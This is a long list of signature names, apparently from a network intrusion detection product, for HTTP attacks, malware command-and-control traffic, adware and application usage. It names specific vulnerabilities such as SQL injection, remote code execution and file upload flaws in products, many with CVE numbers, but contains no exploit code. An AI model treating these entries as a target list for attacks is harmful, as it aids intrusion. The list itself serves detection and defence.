HTTP_CS-Patrowl-PatrowlManager-Unrestricted-File-Upload
HTTP_CS-Percent-Encoded-Ascii-Control-Characters
HTTP_CS-Php-Arbitrary-Location-File-Upload
HTTP_CS-Php-Core-Unserialize-Function-Integer-Overflow
HTTP_CS-Php-Error-Loggin-Format-Strings-Vuln
HTTP_CS-Php-Error-Logging-Format-String-Vuln-3
HTTP_CS-Php-Error-Logging-Format-Strings-Vuln-2
HTTP_CS-Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
HTTP_CS-Php-EXIF-Header-Parsing-Integer-Overflow
HTTP_CS-Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service
HTTP_CS-Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service
HTTP_CS-PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting
HTTP_CS-Php-Globals-Parameter-Usage
HTTP_CS-Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access
HTTP_CS-Php-Memory_Limit-Vulnerability
HTTP_CS-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability
HTTP_CS-Php-OLE-File-Handling-Infinite-Loop
HTTP_CS-Php-Phpinfo-XSS-Post
HTTP_CS-Php-POST-File-Upload-Buffer-Overflow
HTTP_CS-Phpbb-Admin-Cash-Php-System-Compromise
HTTP_CS-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal
HTTP_CS-PhpGedView-Login-Path-Disclosure
HTTP_CS-Phpmyadmin-Tbl_replace.php-Local-File-Inclusion
HTTP_CS-PHPStudy-Backdoor-Remote-Code-Execution
HTTP_CS-Pi-Hole-Top-Domains-API-Authenticated-Exec
HTTP_CS-Pimcore-Key-Field-Stored-Cross-Site-Scripting
HTTP_CS-Pimcore-Multiselect-Getfilterconditionext-SQL-Injection
HTTP_CS-Pimcore-Searchcontroller.PHP-SQL-Injection
HTTP_CS-PingPull-Trojan-C2-HTTP-Traffic
HTTP_CS-Pony-Downloader-C2-Traffic
HTTP_CS-Post-Request-To-IP-Address-Root-Directory
HTTP_CS-Progea-Movicon-EIDP-Denial-Of-Service
HTTP_CS-Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection
HTTP_CS-Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection
HTTP_CS-Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload
HTTP_CS-Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization
HTTP_CS-PRTG-CVE-2023-32781-Authenticated-RCE
HTTP_CS-PSO-Proxy-v0.91-Stack-Buffer-Overflow
HTTP_CS-Pulse-Secure-VPN-Gzip-RCE
HTTP_CS-Put-Nikto-Test
HTTP_CS-pyLoad-js2py-Python-Execution
HTTP_CS-pyLoad-RCE-With-js2py-Sandbox-Escape
HTTP_CS-Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow
HTTP_CS-Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265
HTTP_CS-QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218
HTTP_CS-Quest-Kace-Systems-Management-Run_Report-Command-Injection
HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass
HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow
HTTP_CS-Ranbyus.G-Traffic
HTTP_CS-Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness
HTTP_CS-RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload
HTTP_CS-rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload
HTTP_CS-rConfig-Vendors-Authenticated-File-Upload-RCE
HTTP_CS-Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting
HTTP_CS-Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure
HTTP_CS-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
HTTP_CS-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943
HTTP_CS-Request-To-Suspicious-File
HTTP_CS-Request-To-Suspicious-File-With-Obsolete-Browser
HTTP_CS-Request-To-Suspicious-Poc-File
HTTP_CS-Request-To-Suspicious-Poc-File-With-Obsolete-Browser
HTTP_CS-Ruby-On-Rails-Devise-Password-Reset
HTTP_CS-Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution
HTTP_CS-Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability
HTTP_CS-Rustdoor-Command-and-Control-Traffic
HTTP_CS-Rustock-Bot-Traffic
HTTP_CS-Rustock-Spambot
HTTP_CS-SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution
HTTP_CS-Sality-Botnet-Activity
HTTP_CS-Samba-Swat-Authentication-Base64-BOF
HTTP_CS-Sambar-Server-Search-Script-DoS
HTTP_CS-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
HTTP_CS-SAP-Internet-Graphics-Server-XMLCHART-Xxe
HTTP_CS-SAP-Solution-Manager-Remote-Command-Execution
HTTP_CS-Savant-Web-Server-Overflow
HTTP_CS-Schneider-Electric-Struxureware-Data-Center-Expert-Firmware-Update-Directory-Traversal
HTTP_CS-Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service
HTTP_CS-Script-In-HTTP-POST
HTTP_CS-Seagate-Business-NAS-Remote-Code-Execution
HTTP_CS-SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities
HTTP_CS-Selenium-Chrome-RCE
HTTP_CS-Server-Name-Variable-Spoof
HTTP_CS-Server-Name-Variable-Spoof-2
HTTP_CS-Shared-Variables-For-Client-Stream-Context
HTTP_CS-Shopware-PHP-Object-Instantiation-RCE
HTTP_CS-Siemens-WinCC-TIA-Portal-MiniWeb-DoS
HTTP_CS-Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
HTTP_CS-Simple-PHP-Blog-Remote-Command-Execution
HTTP_CS-Sitecore-Experience-Platform-Preauth-Deserialization-RCE
HTTP_CS-SKYPE-Client-Installed
HTTP_CS-Skype-Client-Version-Check
HTTP_CS-Slowloris-DOS
HTTP_CS-Smokeloader-Malware-Infection-Traffic
HTTP_CS-SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass
HTTP_CS-Solaris-Answerbook2-Format-Strings-Vulnerability
HTTP_CS-Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization
HTTP_CS-Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection
HTTP_CS-Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal
HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2022-22274
HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2023-0656
HTTP_CS-Sony-Xcp-Content-Protection-Software
HTTP_CS-SoreFang-Malware-Infection-Traffic
HTTP_CS-SPIP-BigUp-Plugin-Unauthenticated-RCE
HTTP_CS-Spyeye-Botnet-Request
HTTP_CS-Spyeye-Traffic
HTTP_CS-Squash-YAML-Code-Execution
HTTP_CS-Squid-Acl-Bypass-Using-Null
HTTP_CS-Squid-Ntlm-BOF
HTTP_CS-Squid-Proxy-Cache-Manager-Expired-Pointer-Dereference
HTTP_CS-Squid-Proxy-Cache-Update-Denial-Of-Service
HTTP_CS-Squid-Proxy-Digest-Authentication-Denial-Of-Service
HTTP_CS-Squid-Squoison-Host-Header-Cache-Poisoning
HTTP_CS-Squid-Strlistgetitem-Denial-Of-Service
HTTP_CS-Squirrelwaffle-Loader-Infection-Traffic
HTTP_CS-Srizbi-Spambot
HTTP_CS-STARWHALE-Malware-C2-Traffic
HTTP_CS-StealBit-Malware-Infection-Traffic
HTTP_CS-Studio-42-elFinder-Elfindervolumedriver-Unrestricted-File-Upload
HTTP_CS-Subversion-Apr-Time-T-System-Compromise
HTTP_CS-SugarCRM-PHP-Unserialize-Vulnerability
HTTP_CS-SuiteCRM-Authenticated-SQL-Injection-In-Export-Functionality
HTTP_CS-Sun-Java-Web-Server-WebDAV-Format-String-Vulnerability
HTTP_CS-Sun-One-Iplanet-Chunked-Encoding-BOF
HTTP_CS-Supervene-RazDC-Create-User-Code-Injection
HTTP_CS-Supervene-RazDC-Reset-Password-Code-Injection
HTTP_CS-Support-Incident-Tracker-Remote-Command-Execution
HTTP_CS-Suspected-APT-Traffic-Pattern
HTTP_CS-Suspicious-File-Upload
HTTP_CS-Suspicious-HTTP-Authorization-Negotiate-Token
HTTP_CS-Suspicious-Request
HTTP_CS-Suspicious-Request-Activity
HTTP_CS-Suspicious-Request-Long-URI-No-HTTP-Method
HTTP_CS-Suspicious-Request-URI
HTTP_CS-Suspiciously-Many-Header-Lines-Detected
HTTP_CS-Sybase-M-Business-Anywhere-agSoap.exe-BOF
HTTP_CS-Symantec-Endpoint-Protection-Manager-Cross-Site-Request-Forgery
HTTP_CS-Symantec-Endpoint-Protection-Manager-Xml-External-Entity
HTTP_CS-Symantec-Web-Gateway-Input-Validation-Vulnerability
HTTP_CS-Symantec-Workspace-Streaming-XML-RPC-Arbitrary-File-Upload
HTTP_CS-Synology-DiskStation-Manager-Command-Execution
HTTP_CS-SysAid-Help-Desk-Administrator-Portal-File-Upload
HTTP_CS-Tenda-AX3-Command-Injection-CVE-2023-27240
HTTP_CS-ThiefQuest-C2-Traffic
HTTP_CS-TikiWiki-Information-Disclosure
HTTP_CS-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass
HTTP_CS-Tinba-Bot-Traffic
HTTP_CS-Tinyfilemanager.php-Fullpath-Directory-Traversal
HTTP_CS-TinyNuke-Malware-C2-Traffic
HTTP_CS-TinyTurla-NG-Backdoor-Traffic
HTTP_CS-Tivoli-Endpoint-Buffer-Overflow
HTTP_CS-TRACE-Request
HTTP_CS-TRACK-Request
HTTP_CS-Translate-F-MS00-58-Sourcecode-Disclosure-Attempt
HTTP_CS-Trend-Micro-Control-Manager-Producttree_Rightwindow-XML-External-Entity-Processing
HTTP_CS-Trend-Micro-Control-Manager-Treeusercontrol_Process_Tree_Event-Information-Disclosure
HTTP_CS-Trend-Micro-Iwsva-Managepatches-Filename-Command-Injection
HTTP_CS-Trend-Micro-Iwsva-WMI_Domain_Controllers-Command-Injection
HTTP_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
HTTP_CS-Trend-Micro-OfficeScan-Cgi-Module-Multipart-BOF
HTTP_CS-Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187
HTTP_CS-Trend-Micro-Web-Security-Virtual-Appliance-RCE
HTTP_CS-Trihedral-Vtscada-Web-Interface-Integer-Overflow
HTTP_CS-Trojan.Win32.FraudPack-Checkin
HTTP_CS-TYPO3-Lux-Extension-SQL-Injection
HTTP_CS-Ubiquiti-Networks-AirOS-Directory-Traversal
HTTP_CS-Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting
HTTP_CS-Unauthenticated-RCE-In-NetAlertX
HTTP_CS-V-CMS-PHP-File-Upload-And-Execute-Vulnerability
HTTP_CS-Vercel-Next.js-Improper-URL-Handling-Denial-of-Service
HTTP_CS-VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956
HTTP_CS-VICIDIAL-Multiple-Authenticated-SQLi
HTTP_CS-Vidar-Malware-Infection-Traffic
HTTP_CS-ViRobot-Server-Addschup-Cookie-Buffer-Overflow
HTTP_CS-Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload
HTTP_CS-Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal
HTTP_CS-Vjw0rm-Malware-Infection-Traffic
HTTP_CS-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal
HTTP_CS-VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection
HTTP_CS-VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal
HTTP_CS-VMware-Cloud-Director-Remote-Code-Execution
HTTP_CS-VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service
HTTP_CS-VMware-Server-Isapi-Extension-Remote-Denial-Of-Service
HTTP_CS-VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution
HTTP_CS-VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972
HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload
HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload-2
HTTP_CS-Vtiger-CRM-Authenticated-Remote-Code-Execution
HTTP_CS-Vtiger-Install-Module-Remote-Command-Execution
HTTP_CS-W32/Polybot@mm-Activity
HTTP_CS-W32/Sdbot.worm.gen-Activity
HTTP_CS-WebCalendar-Remote-Code-Injection
HTTP_CS-Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting
HTTP_CS-Webmin-Upload-Authenticated-RCE
HTTP_CS-WebsitePro-Path-Disclosure
HTTP_CS-Western-Digital-MyCloud-Unauthenticated-Command-Injection
HTTP_CS-Whisker-Scan-Detect
HTTP_CS-WikkaWiki-Remote-PHP-Injection
HTTP_CS-Windows-Explorer-HTA-CLSID-System-Compromise
HTTP_CS-Windows-Media-Services-MX-STATS-LogLine-NSIISlog-DLL-BOF
HTTP_CS-Windows-Media-Services-NSIISlog-DLL-BOF
HTTP_CS-Windows-Remote-Management-Activity
HTTP_CS-Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE
HTTP_CS-Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection
HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Possible-File-Inclusion
HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution
HTTP_CS-Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE
HTTP_CS-Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner
HTTP_CS-Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass
HTTP_CS-Wordpress-File-Manager-Advanced-Shortcode-RCE
HTTP_CS-Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload
HTTP_CS-Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload
HTTP_CS-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
HTTP_CS-Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting
HTTP_CS-Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload
HTTP_CS-Wordpress-Photo-Gallery-Unrestricted-File-Upload
HTTP_CS-Wordpress-Pingback
HTTP_CS-Wordpress-Plugin-Backup-Guard-Authenticated-RCE
HTTP_CS-Wordpress-Plugin-Catch-Themes-Demo-Import-RCE
HTTP_CS-Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE
HTTP_CS-Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE
HTTP_CS-Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation
HTTP_CS-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
HTTP_CS-Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE
HTTP_CS-Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload
HTTP_CS-Wordpress-WP-Time-Capsule-Arbitrary-File-Upload
HTTP_CS-Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload
HTTP_CS-Wordpress-wpDiscuz-Unauthenticated-File-Upload
HTTP_CS-WPEverest-WordPess-Plugin-Arbitrary-File-Upload
HTTP_CS-WSO2-Unrestricted-File-Upload-CVE-2022-29464
HTTP_CS-X-Forwarded-For-Header-Detected
HTTP_CS-xArrow-Webserver-DoS
HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
HTTP_CS-Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
HTTP_CS-Xml-Pear-Xml-RPC-And-Phpxmlrpc-Eval-Command-Execution
HTTP_CS-XMLDsig-Hmac-Truncation-Authentication-Bypass
HTTP_CS-XSS-Post-To-SEO-Exploit-Kit
HTTP_CS-Xunlei-Thunder-Network-Connect
HTTP_CS-Xwiki-Filename-Stored-Cross-Site-Scripting
HTTP_CS-Xwiki-Upload-Reflected-Cross-Site-Scripting
HTTP_CS-YoungZSoft-CCProxy-Connect-Buffer-Overflow
HTTP_CS-Ysoserial-Generated-DotNet-Serialized-Object-In-A-MSMQ-Message
HTTP_CS-Zabbix-Server-Setup.php-Authentication-Bypass-CVE-2022-23134
HTTP_CS-Zeus-Configuration-File-Download
HTTP_CS-Zeus-Post-Request-Detected
HTTP_CS-Zeus-Zbot-Botnet-Configuration-Download
HTTP_CS-Zeus-Zbot-Botnet-Possible-Configuration-Download
HTTP_CS-Zeus-Zbot-Botnet-POST-Request-To-CnC
HTTP_CS-Zimbra-Collaboration-Memcached-Command-Injection-In-Authorization-Header-CVE-2022-27924
HTTP_CS-Zivif-Camera-iptest.cgi-Blind-RCE
HTTP_CS-Zoho-Manageengine-Admanager-Plus-CVE-2021-37539-Unrestricted-File-Upload
HTTP_CS-Zoho-Manageengine-Admanager-Plus-Licenseaction-Unrestricted-File-Upload
HTTP_CS-Zoho-Manageengine-Admanager-Plus-Modifyphotoaction-Unrestricted-File-Upload
HTTP_CS-Zoho-Manageengine-Admanager-Plus-Passwordexpiryaction-Unrestricted-File-Upload
HTTP_CS-Zoho-Manageengine-Admanager-Plus-ReportsAction-Unrestricted-File-Upload
HTTP_CS-Zoho-Manageengine-Applications-Manager-Uploadaction-Arbitrary-File-Upload
HTTP_CS-Zoho-Manageengine-Multiple-Products-Importtechniciansaction-Arbitrary-File-Upload
HTTP_CS-Zoho-Manageengine-Multiple-Products-URL-Monitoring-SQL-Injection
HTTP_CS-Zoho-Manageengine-Network-Configuration-Manager-CVE-2021-41081-SQL-Injection
HTTP_CS-Zoho-Manageengine-Opmanager-Business-View-Background-Image-Arbitrary-File-Upload
HTTP_CS-Zoho-Manageengine-Password-Manager-Pro-Autologonhelperutil-SQL-Injection
HTTP_CS-Zoho-Manageengine-Password-Manager-Pro-Queryreportcontroller-SQL-Injection
HTTP_CS-Zoho-Manageengine-Servicedesk-Plus-CVE-2021-37415-Authentication-Bypass
HTTP_CS-Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077
HTTP_CS-ZoneMinder-Language-Settings-Remote-Code-Execution
HTTP_CS-Zope-XMLTools-Plone-Remote-Command-Execution
HTTP_CSC-Shared-Variables
HTTP_CSH-2020search
HTTP_CSH-2nd-Thought
HTTP_CSH-427BB-Authentication-Bypass
HTTP_CSH-4Shared-Access
HTTP_CSH-ABetterInternet
HTTP_CSH-Acnetsteal-Traffic
HTTP_CSH-Actualscripts-Actualanalyzer-Cookie-Command-Execution
HTTP_CSH-Acunetix-Vulnerability-Scanner-Usage
HTTP_CSH-Adload-Command-And-Control-Traffic
HTTP_CSH-Adobe-ColdFusion-Improper-Access-Control-File-Read-CVE-2024-20767
HTTP_CSH-Adobe-Flash-Player-Usage
HTTP_CSH-Adsincontext
HTTP_CSH-Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal
HTTP_CSH-Adware-180sa
HTTP_CSH-Adware-Adroar
HTTP_CSH-Adware-Adtomi
HTTP_CSH-Adware-Bdsearch
HTTP_CSH-Adware-Casclient
HTTP_CSH-Adware-Commonname
HTTP_CSH-Adware-Exactsearch
HTTP_CSH-Adware-Ilookup
HTTP_CSH-Adware-mysearch
HTTP_CSH-Adware-Pornkings
HTTP_CSH-Adware-Rapidblaster
HTTP_CSH-Adware-Searchaid
HTTP_CSH-Adware-Searchcentrix
HTTP_CSH-Adware-Sidesearch
HTTP_CSH-Adware-Slotch
HTTP_CSH-Adware-Tickerbar
HTTP_CSH-Adware-Toolbarcc
HTTP_CSH-Adware-Tvmedia
HTTP_CSH-Adware-Websearch
HTTP_CSH-Aldi-Bot-Traffic
HTTP_CSH-Altnet-Peer-Points-Manager
HTTP_CSH-Altnet-Topsearch
HTTP_CSH-Android/Bgserv-Traffic
HTTP_CSH-Apache-Activemq-File-Upload-Directorytraversal
HTTP_CSH-Apache-Activemq-Fileserver-Move-Directory-Traversal
HTTP_CSH-Apache-Byte-Range-Filter-Denial-Of-Service
HTTP_CSH-Apache-Camel-Filter-Bypass-CVE-2025-27636
HTTP_CSH-Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload
HTTP_CSH-Apache-Host-Header-Default-Error-Page-XSS
HTTP_CSH-Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service
HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service
HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service-2
HTTP_CSH-Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service
HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service
HTTP_CSH-Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read
HTTP_CSH-Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure
HTTP_CSH-Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service
HTTP_CSH-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
HTTP_CSH-Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service
HTTP_CSH-Apache-Httpd-Mod_sed-Integer-Overflow
HTTP_CSH-Apache-Httpd-Multiple-Mime-Headers-DoS-2
HTTP_CSH-Apache-Httpd-Range-Header-Field-Memory-Exhaustion
HTTP_CSH-Apache-ISAPI-Module-Dangling-Pointer
HTTP_CSH-Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065
HTTP_CSH-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
HTTP_CSH-Apache-Shiro-Remote-Code-Execution
HTTP_CSH-Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection
HTTP_CSH-Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service
HTTP_CSH-Apache-Subversion-Mod_Dav_SVN-Integer-Overflow
HTTP_CSH-Apache-Tika-Server-Command-Injection-Vulnerability
HTTP_CSH-Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop
HTTP_CSH-Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
HTTP_CSH-Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service
HTTP_CSH-Apache-Traffic-Server-HTTP-Range-Denial-Of-Service
HTTP_CSH-Apple-Aperture-Usage
HTTP_CSH-Apple-Core-Media-Usage
HTTP_CSH-Apple-iPhone-Maps-Usage
HTTP_CSH-Apple-iPhoto-8.0-Usage
HTTP_CSH-Apple-iPhoto-8.1-Usage
HTTP_CSH-Apple-iTunes-Usage
HTTP_CSH-Apple-Publication-Subscription-Service-Usage
HTTP_CSH-Apple-Software-Update-Usage
HTTP_CSH-AppleWebKit-Usage
HTTP_CSH-Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal
HTTP_CSH-Ask-Jeeves-Teoma-Web-Spider
HTTP_CSH-Asn-1-Bitstring-Overflow-MS04-007
HTTP_CSH-Asterisk-Management-Interface-Digest-Authentication-Stack-BOF
HTTP_CSH-Avast-Internet-Security-Syncer-User-Agent
HTTP_CSH-Avgesi.B-Traffic
HTTP_CSH-Azureus-Client
HTTP_CSH-BadBind.A-Traffic
HTTP_CSH-Badbox-Botnet-C2-Traffic
HTTP_CSH-Baiduspider-Web-Spider
HTTP_CSH-Bargain-Buddy-Install
HTTP_CSH-Bargain-Buddy-Traffic
HTTP_CSH-Bash-Shellshock-Code-Injection
HTTP_CSH-Basic-Authentication-Header-Buffer-Overflow
HTTP_CSH-Basic-Authentication-Username-Contains-Format-String-Characters
HTTP_CSH-Bazar-Loader-Backdoor-Malware-Infection-Traffic
HTTP_CSH-BigBrother-User-Agent
HTTP_CSH-Binary-Data-In-Long-Host-Header-Field
HTTP_CSH-BitComet-Client
HTTP_CSH-BitDefender-Nimbus-Client-User-Agent
HTTP_CSH-BitTornado-P2P-Client
HTTP_CSH-BitTorrent-Client
HTTP_CSH-BitTorrent-Over-Port-80
HTTP_CSH-Blazefind
HTTP_CSH-Blizzard-Downloader-Usage
HTTP_CSH-Blizzard-World-Of-Warcraft-Usage
HTTP_CSH-Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload
HTTP_CSH-Blue-Coat-WinProxy-Host-Header-Buffer-Overflow
HTTP_CSH-Bohu-Trojan-Traffic-Detected
HTTP_CSH-Bookedspace
HTTP_CSH-Bredolab-Bot-Activity
HTTP_CSH-Broadcastpc
HTTP_CSH-Brocade-Network-Advisor-Filename-Directory-Traversal
HTTP_CSH-Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal
HTTP_CSH-Browser-User-Agent-Android
HTTP_CSH-Browser-User-Agent-Android-1-Mobile
HTTP_CSH-Browser-User-Agent-Android-1-Tablet
HTTP_CSH-Browser-User-Agent-Android-2-Mobile
HTTP_CSH-Browser-User-Agent-Android-2-Tablet
HTTP_CSH-Browser-User-Agent-Android-3-Mobile
HTTP_CSH-Browser-User-Agent-Android-3-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.0-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.0-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.1-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.1-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.2-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.2-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.3-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.3-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.4-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.4-Tablet
HTTP_CSH-Browser-User-Agent-Android-5.0-Mobile
HTTP_CSH-Browser-User-Agent-Android-5.0-Tablet
HTTP_CSH-Browser-User-Agent-Android-5.1-Mobile
HTTP_CSH-Browser-User-Agent-Android-5.1-Tablet
HTTP_CSH-Browser-User-Agent-iPad
HTTP_CSH-Browser-User-Agent-iPhone
HTTP_CSH-Browser-User-Agent-Linux
HTTP_CSH-Browser-User-Agent-Linux-CentOS
HTTP_CSH-Browser-User-Agent-Mac-OS-X
HTTP_CSH-Browser-User-Agent-Mac-OS-X-Leopard
HTTP_CSH-Browser-User-Agent-Mac-OS-X-Snow-Leopard
HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Mobile
HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Tablet
HTTP_CSH-Browser-User-Agent-Windows-2000
HTTP_CSH-Browser-User-Agent-Windows-2003
HTTP_CSH-Browser-User-Agent-Windows-7
HTTP_CSH-Browser-User-Agent-Windows-8
HTTP_CSH-Browser-User-Agent-Windows-8.1
HTTP_CSH-Browser-User-Agent-Windows-98
HTTP_CSH-Browser-User-Agent-Windows-Phone
HTTP_CSH-Browser-User-Agent-Windows-Phone-7
HTTP_CSH-Browser-User-Agent-Windows-Phone-7.5
HTTP_CSH-Browser-User-Agent-Windows-Phone-7.8
HTTP_CSH-Browser-User-Agent-Windows-Phone-8
HTTP_CSH-Browser-User-Agent-Windows-Phone-8.1
HTTP_CSH-Browser-User-Agent-Windows-Vista
HTTP_CSH-Browser-User-Agent-Windows-XP
HTTP_CSH-Browser-User-Agent-Windows-XP-SP2
HTTP_CSH-BTSP-P2P-Client
HTTP_CSH-Bugbear-Worm-Download
HTTP_CSH-Cacti-Group-Cacti-Remote_Agent-Command-Injection
HTTP_CSH-Carberp-Botnet-Traffic-Detected
HTTP_CSH-CashBack-Buddy-Activity
HTTP_CSH-Chrome-Browser-Usage
HTTP_CSH-Cisco-Small-Business-RV-Series-Authentication-Bypass-And-Command-Injection
HTTP_CSH-Cisco-Smart-Licensing-Utility-Static-Administrative-Credentials-CVE-2024-20439
HTTP_CSH-Citrix-NetScaler-SD-WAN-CGISESSID-Command-Execution-CVE-2017-6316
HTTP_CSH-Clamav-Update-Agent-Usage
HTTP_CSH-Clearsearch
HTTP_CSH-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-50623
HTTP_CSH-Click2findnow
HTTP_CSH-ClickSpring-PuritySCAN-Application-Usage
HTTP_CSH-CMS-Made-Simple-Cache-Poisoning
HTTP_CSH-Cobalt-Strike-C2-HTTP-Traffic
HTTP_CSH-Codesys-V3-Cmpwebserverhandler-Memgcgetsize-Integer-Overflow
HTTP_CSH-ColdFusion-Admin-Password-DoS
HTTP_CSH-Connection-Upgrade-Request
HTTP_CSH-Conspy
HTTP_CSH-Contec-Conprosys-HMI-System-Cpostgresql.php-SQL-Injection
HTTP_CSH-CrushFTP-S3-Authentication-Bypass-CVE-2025-2825
HTTP_CSH-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040
HTTP_CSH-Curl-Tool-Usage
HTTP_CSH-CyberArk-Password-Vault-Web-Access-Remote-Code-Execution
HTTP_CSH-Cycbot-Bot-Traffic
HTTP_CSH-D-Link-Backdoor-CVE-2013-6026
HTTP_CSH-D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839
HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution
HTTP_CSH-D-Link-HNAP-SOAPAction-Stack-Overflow
HTTP_CSH-Debian-Advanced-Packaging-Tool
HTTP_CSH-Delfin-Media-Viewer-g181511-User-Agent
HTTP_CSH-Delfin-Media-Viewer-PromulGate-User-Agent
HTTP_CSH-Deluge-Client
HTTP_CSH-Deluge-P2P-Client
